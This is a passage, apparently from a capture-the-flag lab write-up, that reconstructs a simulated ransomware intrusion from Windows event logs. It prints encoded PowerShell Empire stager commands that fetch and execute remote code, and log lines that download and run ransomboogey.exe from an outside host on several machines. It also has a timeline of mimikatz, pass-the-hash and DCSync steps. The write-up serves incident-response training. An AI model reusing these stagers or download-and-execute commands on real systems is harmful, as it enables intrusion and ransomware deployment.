kACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==}"
  2023-08-30T02:06:25.390Z  Administrator@WKSTN-0051	2340	5004	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {powershell -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==}"

IV. Ransomware

The attacker after having full control of the QUICKLOGISTICS.ORG domain downloaded and executed suspicious file, ransomboogey.exe, as well as on WKSTN-1327. The ransomware was downloaded on WKSTN-0051 but there were no signs of execution:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01 | grep 4008

  [..omitted..]
  2023-08-30T01:53:13.738Z  Administrator@DC01	4308	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile ransomboogey.exe"
  2023-08-30T01:53:33.815Z  Administrator@DC01	5572	4008	"C:\Users\Administrator\ransomboogey.exe"
  2023-08-30T01:54:11.095Z  Administrator@DC01	4404	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {hostname}"
  2023-08-30T01:54:24.982Z  Administrator@DC01	6808	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {hostname}"
  2023-08-30T01:56:05.018Z  Administrator@DC01	4296	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile ransomboogey.exe; .\ransomboogey.exe}"
  2023-08-30T01:56:40.186Z  Administrator@DC01	6436	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\itadmin\ransomboogey.exe; C:\Users\itadmin\ransomboogey.exe}"
  2023-08-30T01:57:53.649Z  Administrator@DC01	5984	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {C:\Users\itadmin\ransomboogey.exe}"
  2023-08-30T01:59:36.244Z  Administrator@DC01	5148	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\itadmin\ransomboogey.exe;}"
  2023-08-30T02:00:58.090Z  Administrator@DC01	3672	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {hostname}"
  2023-08-30T02:01:14.244Z  Administrator@DC01	4384	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\evan.hutchinson\ransomboogey.exe;}"
  [..omitted..]

An execution of ransomboogey.exe by itadmin could also be seen on WKSTN-1327:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 7300        

  [..omitted..]
  2023-08-30T02:04:59.635Z  itadmin@WKSTN-1327	7300	7264	C:\Windows\Explorer.EXE
  [..omitted..]
  2023-08-30T02:07:22.741Z  itadmin@WKSTN-1327	8804	7300	"C:\Users\itadmin\ransomboogey.exe" 
  [..omitted..]

TIMELINE OF EVENTS

TIMESTAMP EVENT

TIMESTAMP	EVENT
2023-08-29 23:51:15	Execution of the malicious HTA file.
2023-08-29 23:51:16	Established persistence on `WKSTN-0051` via Scheduled Task.
2023-08-29 23:54:50	`WKSTN-0051` calls back to the Empire C2 server.
2023-08-30 00:09:57	Download of `mimikatz.exe` on `WKSTN-0051`.
2023-08-30 00:11:26	First seen execution of `mimikatz.exe` on `WKSTN-0051`.
2023-08-30 00:19:52	Credentials of `allan.smith` found on `IT_Automation.ps1`
2023-08-30 00:21:52	Execution of Empire stager on `WKSTN-1327` from `WKSTN-0051`.
2023-08-30 01:29:09	Download of `mimikatz.exe` on `WKSTN-1327`.
2023-08-30 01:30:25	First seen execution of `mimikatz.exe` on `WKSTN-1327`.
2023-08-30 01:31:39	Pass-the-Hash using the Domain Administrator on `WKSTN-1327`.
2023-08-30 01:45:41	Execution of Empire stager on `DC01` from `WKSTN-0051`.
2023-08-30 01:46:18	Download of `mimikatz.exe` on `DC01`.
2023-08-30 01:47:57	DCSync attack on the Domain Administrator user, `backupda`.
2023-08-30 01:53:13	Download of `ransomboogey.exe` on `DC01`.
2023-08-30 01:53:33	Execution of `ransomboogey.exe` on `DC01` by `Administrator`.
2023-08-30 01:56:40	Last download of `ransomboogey.exe` on `WKSTN-1327`.
2023-08-30 01:59:36	First download of `ransomboogey.exe` on `WKSTN-0051`.
2023-08-30 02:06:09	Empire stager execution as DA on `WKSTN-0051`.
2023-08-30 02:06:25	Empire stager execution as DA on `WKSTN-1327`.
2023-08-30 02:07:22	Execution of `ransomboogey.exe` on `WKSTN-1327` by `itadmin`.

2023-08-29 23:51:15

Execution of the malicious HTA file.

2023-08-29 23:51:16

Established persistence on WKSTN-0051 via Scheduled Task.

2023-08-29 23:54:50

WKSTN-0051 calls back to the Empire C2 server.

2023-08-30 00:09:57

Download of mimikatz.exe on WKSTN-0051.

2023-08-30 00:11:26

First seen execution of mimikatz.exe on WKSTN-0051.

2023-08-30 00:19:52

Credentials of allan.smith found on IT_Automation.ps1

2023-08-30 00:21:52

Execution of Empire stager on WKSTN-1327 from WKSTN-0051.

2023-08-30 01:29:09

Download of mimikatz.exe on WKSTN-1327.

2023-08-30 01:30:25

First seen execution of mimikatz.exe on WKSTN-1327.

2023-08-30 01:31:39

Pass-the-Hash using the Domain Administrator on WKSTN-1327.

2023-08-30 01:45:41

Execution of Empire stager on DC01 from WKSTN-0051.

2023-08-30 01:46:18

Download of mimikatz.exe on DC01.

2023-08-30 01:47:57

DCSync attack on the Domain Administrator user, backupda.

2023-08-30 01:53:13

Download of ransomboogey.exe on DC01.

2023-08-30 01:53:33

Execution of ransomboogey.exe on DC01 by Administrator.

2023-08-30 01:56:40

Last download of ransomboogey.exe on WKSTN-1327.

2023-08-30 01:59:36

First download of ransomboogey.exe on WKSTN-0051.

2023-08-30 02:06:09

Empire stager execution as DA on WKSTN-0051.

2023-08-30 02:06:25

Empire stager execution as DA on WKSTN-1327.

2023-08-30 02:07:22

Execution of ransomboogey.exe on WKSTN-1327 by itadmin.

PreviousTryHackMe NextBoogeyman 2

Last updated 5 months ago